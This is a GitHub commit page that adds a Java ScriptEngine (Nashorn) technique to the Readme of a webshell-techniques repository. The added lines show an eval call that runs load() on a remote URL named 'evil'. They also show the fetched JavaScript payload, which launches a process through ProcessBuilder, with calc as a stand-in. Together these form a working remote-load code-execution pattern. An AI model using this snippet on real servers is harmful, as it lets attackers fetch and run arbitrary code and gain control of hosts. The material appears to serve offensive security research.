Skip to content

Commit f862bd9

Browse files
FirebaskyFirebasky
authored
Update Readme.md
1 parent e56d73c commit f862bd9

1 file changed

Lines changed: 9 additions & 1 deletion

File tree

shell/ScriptEngineManager/Readme.md

Lines changed: 9 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -150,5 +150,13 @@ public class main {
150150

151151
之前在安全客上介绍了这个利用思路[文章](https://www.anquanke.com/post/id/248771#h3-3),当时没有利用成功,今天晚上jiang师傅给我说了利用思路。大概是一个load()去远程加载执行。
152152

153-
154153
https://anuradha-15.medium.com/loading-scripts-using-nashorn-85585f495cf0
154+
155+
```java
156+
String url = "http://127.0.0.1:8089/evil" ;
157+
eval("load('"+url+"')");
158+
```
159+
evil
160+
```java
161+
var a=exp();function exp(){var x=new java.lang.ProcessBuilder; x.command("calc"); x.start();};
162+
```

0 commit comments

Comments
 (0)